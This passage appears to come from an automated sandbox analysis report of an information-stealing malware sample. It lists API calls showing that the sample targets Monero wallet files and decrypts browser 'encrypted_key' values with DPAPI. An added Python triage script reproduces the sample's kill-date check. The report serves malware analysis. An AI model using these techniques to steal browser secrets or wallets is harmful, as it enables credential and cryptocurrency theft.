                  • Instruction Fuzzy Hash: 7121BA75D1420CABCF04EFE8E9459EEB7B5FF48300F04852AE41AA3250EB749645DB66
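The GetSystemTime / sscanf / SystemTimeToFileTime / ExitProcess sequence above is the shape of an expiry check: the current UTC time and a date parsed from an embedded string are both converted to FILETIME (a single 64-bit tick count, which makes the comparison one integer compare) and the process exits on the wrong side of it. The script below is an added example for triage, not code from the sample or from Joe Sandbox. It assumes a `YYYY-MM-DD` date format and an "exit when now is later than the date" direction, since neither the sscanf format string nor the branch sense is visible in the report; swap in the real format once it is recovered from the binary.

```python
from datetime import datetime, timezone
from typing import Dict

# Ticks (100 ns) between the FILETIME epoch 1601-01-01 and the Unix epoch.
FILETIME_EPOCH_DIFF = 116_444_736_000_000_000


def to_filetime(dt: datetime) -> int:
    """Equivalent of SystemTimeToFileTime: 100 ns ticks since 1601-01-01 UTC."""
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)  # GetSystemTime hands back UTC
    return int(dt.timestamp()) * 10_000_000 + FILETIME_EPOCH_DIFF


def parse_kill_date(text: str, fmt: str = "%Y-%m-%d") -> datetime:
    """Stand-in for the sscanf call. The report does not show the format
    string, so 'YYYY-MM-DD' is an assumption; pass the real format when known."""
    return datetime.strptime(text.strip(), fmt).replace(tzinfo=timezone.utc)


def check_kill_date(now: datetime, kill_date_text: str,
                    fmt: str = "%Y-%m-%d") -> Dict[str, object]:
    """Reproduce the comparison: both SYSTEMTIMEs become FILETIMEs, and the
    sample is assumed to call ExitProcess once the clock is past the date."""
    deadline = parse_kill_date(kill_date_text, fmt)
    now_ft, deadline_ft = to_filetime(now), to_filetime(deadline)
    ticks_left = deadline_ft - now_ft
    return {
        "exits": now_ft > deadline_ft,
        "days_left": ticks_left // (10_000_000 * 86_400),
        # Set the sandbox's UTC clock no later than this to get past the check.
        "latest_sandbox_clock": deadline.strftime("%Y-%m-%d"),
    }


if __name__ == "__main__":
    # Constructed date, not one recovered from this sample.
    print(check_kill_date(datetime.now(timezone.utc), "2024-09-30"))
```

The practical point for sandbox work: because the comparison is on GetSystemTime, only the guest's UTC clock matters, not its time zone. If a sample of this family runs for a few milliseconds and exits with nothing else happening, check the embedded date string before concluding the detonation failed.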
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D47E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,00AEC010,00000000,00020119,?), ref: 00D47E5E
                  • RegQueryValueExA.ADVAPI32(?,00AFDD60,00000000,00000000,000000FF,000000FF), ref: 00D47E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00D47E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                  • Instruction ID: 8db298208410da85f1af5db1dc7e038a3dfafeaada69439b69b4d8b6882efeda
                  • Opcode Fuzzy Hash: caa41c43f4dbb1aaea3dce848c0348d0078d81c9383eaa56b55aaf687f4829ce
                  • Instruction Fuzzy Hash: D31191B1A44209EBD704CF94DC49FBFBBB8EB44701F104269FA19A7280D77458009BB2
                  APIs
                  • StrStrA.SHLWAPI(00AFDED0,?,?,?,00D4140C,?,00AFDED0,00000000), ref: 00D4926C
                  • lstrcpyn.KERNEL32(00F7AB88,00AFDED0,00AFDED0,?,00D4140C,?,00AFDED0), ref: 00D49290
                  • lstrlen.KERNEL32(?,?,00D4140C,?,00AFDED0), ref: 00D492A7
                  • wsprintfA.USER32 ref: 00D492C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                  • Instruction ID: bd621b90faaab6e2a49f72188de5a4307ad749fdf73b48cf2b1533522225b596
                  • Opcode Fuzzy Hash: 6213edee1f0e4e9a71eb97b2dc816c4d7381815e42be341e39e70885bca387df
                  • Instruction Fuzzy Hash: 5701E97550010CFFCB04DFECC994EAE7BB9EB84351F118188F9098B201C671AA50EBA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D312B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D312BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00D312D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00D312F5
                  • RegCloseKey.ADVAPI32(?), ref: 00D312FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                  • Instruction ID: 8d393aeefcad8b54cfaff967a2e5df8a4739ea223602a029ee273b1eff2ae1b5
                  • Opcode Fuzzy Hash: 1ec3c674cf6d7e5cfd72ab8a12863bd5356a7d04b8175aaf380712dbc6a5cffa
                  • Instruction Fuzzy Hash: 8E01E1B9A4020DBBDB04DFE4DC49FAEB7B8EB88701F108159FA0997280D6759A419F52
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00D46663
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00D46726
                  • ExitProcess.KERNEL32 ref: 00D46755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                  • Instruction ID: dacd898773cd9186cf43087a30bfd6579d8a87000d8e108e99bd1adf535b8d16
                  • Opcode Fuzzy Hash: 0fe456ca2b449961d4d16b66e97028195031b05e726f8f2037db438b4137bfdf
                  • Instruction Fuzzy Hash: 38310CB1841218ABEB14EBA4DC96FDEB778EF44300F404199F20966191DF746B89CF76
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00D50E28,00000000,?), ref: 00D4882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D48836
                  • wsprintfA.USER32 ref: 00D48850
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                  • Instruction ID: e8cf9485563fdad084531af7c4ff7d2d2a78c92a01c05bbcdaf648583639d9ee
                  • Opcode Fuzzy Hash: 834d08d8b0ef8f6607af76f6b1bd9f4518d37fa9ec73a776cfaf9320346b666f
                  • Instruction Fuzzy Hash: 832130B1A40208AFDB04DF94DD45FAEBBB8FB48701F144159F619A7280C77999419BA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D4951E,00000000), ref: 00D48D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00D48D62
                  • wsprintfW.USER32 ref: 00D48D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesswsprintf
                  • String ID: %hs
                  • API String ID: 769748085-2783943728
                  • Opcode ID: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                  • Instruction ID: d981db67a730bed3978b01c4211eb8670daf2b39eeacac714cca1011a62adf2c
                  • Opcode Fuzzy Hash: 22f38379a0ba984f71984899d677777648a4155920c881a0821ec2a81d8da9b4
                  • Instruction Fuzzy Hash: 43E0ECB5A4020CBFDB14DB94DD0AE6D7BBCEB84702F044194FD0D97280DA719E54ABA7
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3A2E1
                  • lstrlen.KERNEL32(00000000,00000000), ref: 00D3A3FF
                  • lstrlen.KERNEL32(00000000), ref: 00D3A6BC
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3A743
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                  • Instruction ID: eae38fd510842dabaa083300f8d31e3322ad164dc73cfb37da3c4618db5c3a9d
                  • Opcode Fuzzy Hash: 7122a964b414726954bf3f1d2f071eae59a116d60e4694c2de093601539bdffb
                  • Instruction Fuzzy Hash: 85E1ED72850118ABEB15FBA8DC92EEE7338EF54304F518169F516B6091EF306A4DCB72
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D481
                  • lstrlen.KERNEL32(00000000), ref: 00D3D698
                  • lstrlen.KERNEL32(00000000), ref: 00D3D6AC
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3D72B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                  • Instruction ID: af098c426f7b9fdf2dee618d6c252d65c12d67ffb54557ee3396bca1aa2c27f1
                  • Opcode Fuzzy Hash: ee392926dfde5d29402c1376b3bf04e4bbd56da528a811036ef5a7e8cfefacb8
                  • Instruction Fuzzy Hash: 83912072850118ABEB04FBA8DC92EEE7339EF54304F514569F507B6092EF346A49CB72
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D48B60: GetSystemTime.KERNEL32(00D50E1A,00AFA690,00D505AE,?,?,00D313F9,?,0000001A,00D50E1A,00000000,?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D48B86
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00D3D801
                  • lstrlen.KERNEL32(00000000), ref: 00D3D99F
                  • lstrlen.KERNEL32(00000000), ref: 00D3D9B3
                  • DeleteFileA.KERNEL32(00000000), ref: 00D3DA32
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                  • String ID:
                  • API String ID: 211194620-0
                  • Opcode ID: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                  • Instruction ID: dc1ade036a89be8e7d23605ca322a674c967e57ca19bad55de2e35bbb6da6f98
                  • Opcode Fuzzy Hash: fafeca9f6a4a0b536e5985982710c2e9a4faad3cfa0adffd873251538bffc09f
                  • Instruction Fuzzy Hash: 80812D728501189BEB04FBA8DC92EEE7339EF54304F514529F407B6092EF346A49CBB2
                  APIs
                    • Part of subcall function 00D4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D4A7E6
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,00AF91D8,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                    • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                    • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                    • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                    • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                    • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00D51580,00D50D92), ref: 00D3F54C
                  • lstrlen.KERNEL32(00000000), ref: 00D3F56B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                  • String ID: ^userContextId=4294967295$moz-extension+++
                  • API String ID: 998311485-3310892237
                  • Opcode ID: 2afca6ef17628f6599d288b5fcc470358ad3a5ceb92dcc25ee9d4fcf8cf5c147
                  • Instruction ID: 64262da635bab3ede67b9b30719bd6d0caffa6b47d3c2ee75031b8187d4dbb64
                  • Opcode Fuzzy Hash: 2afca6ef17628f6599d288b5fcc470358ad3a5ceb92dcc25ee9d4fcf8cf5c147
                  • Instruction Fuzzy Hash: 9B511E76D50108ABEB14FBA8DC96DED7338EF54304F408528F816A7191EE346A0DCBB2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen
                  • String ID:
                  • API String ID: 367037083-0
                  • Opcode ID: f54b29ac73871c0a04edc18f0bfac55f231fe61d9808f4dee9fefe7beccb48ee
                  • Instruction ID: e3252581e48ac3b64eee8fcf5c086a89a4a0b96b8e6c1a9030693bbe57ad9c34
                  • Opcode Fuzzy Hash: f54b29ac73871c0a04edc18f0bfac55f231fe61d9808f4dee9fefe7beccb48ee
                  • Instruction Fuzzy Hash: 6E412D71D14209AFDF04EFA8D845AEEB774EF54304F148018E81676291DB75AA49CFB2
                  APIs
                    • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                    • Part of subcall function 00D399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D399EC
                    • Part of subcall function 00D399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00D39A11
                    • Part of subcall function 00D399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00D39A31
                    • Part of subcall function 00D399C0: ReadFile.KERNEL32(000000FF,?,00000000,00D3148F,00000000), ref: 00D39A5A
                    • Part of subcall function 00D399C0: LocalFree.KERNEL32(00D3148F), ref: 00D39A90
                    • Part of subcall function 00D399C0: CloseHandle.KERNEL32(000000FF), ref: 00D39A9A
                    • Part of subcall function 00D48E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00D48E52
                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00D39D39
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39AEF
                    • Part of subcall function 00D39AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00D34EEE,00000000,?), ref: 00D39B01
                    • Part of subcall function 00D39AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00D34EEE,00000000,00000000), ref: 00D39B2A
                    • Part of subcall function 00D39AC0: LocalFree.KERNEL32(?,?,?,?,00D34EEE,00000000,?), ref: 00D39B3F
                    • Part of subcall function 00D39B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                    • Part of subcall function 00D39B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                    • Part of subcall function 00D39B60: LocalFree.KERNEL32(?), ref: 00D39BD3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.00000000011E9000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000120D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000001225000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713049340.0000000001226000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713140005.00000000013BC000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1713155067.00000000013BD000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                  • String ID: $"encrypted_key":"$DPAPI
                  • API String ID: 2100535398-738592651
                  • Opcode ID: 45947749e35a5d86b88133521fa46e8c2bcce305c84509f8fb3131e7e9c47752
                  • Instruction ID: 3386afe1a046563345dd6d9b658a8afb352d783df97a6d871da33d27b4323f15
                  • Opcode Fuzzy Hash: 45947749e35a5d86b88133521fa46e8c2bcce305c84509f8fb3131e7e9c47752
                  • Instruction Fuzzy Hash: 0C312FB6D10209ABCF14DBE4DC96AEEB7B8EF48304F184519E905A7241EB749A05CBB1
                  APIs
                  • memset.MSVCRT ref: 00D494EB
                    • Part of subcall function 00D48D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00D4951E,00000000), ref: 00D48D5B
                    • Part of subcall function 00D48D50: RtlAllocateHeap.NTDLL(00000000), ref: 00D48D62
                    • Part of subcall function 00D48D50: wsprintfW.USER32 ref: 00D48D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00D495AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00D495C9
                  • CloseHandle.KERNEL32(00000000), ref: 00D495D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1712704470.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                  • Associated: 00000000.00000002.1712690782.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000DED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000E12000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712704470.0000000000F7A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1712841516.000000000110C000.00000040.00000001.01000000.00000003.sdmp
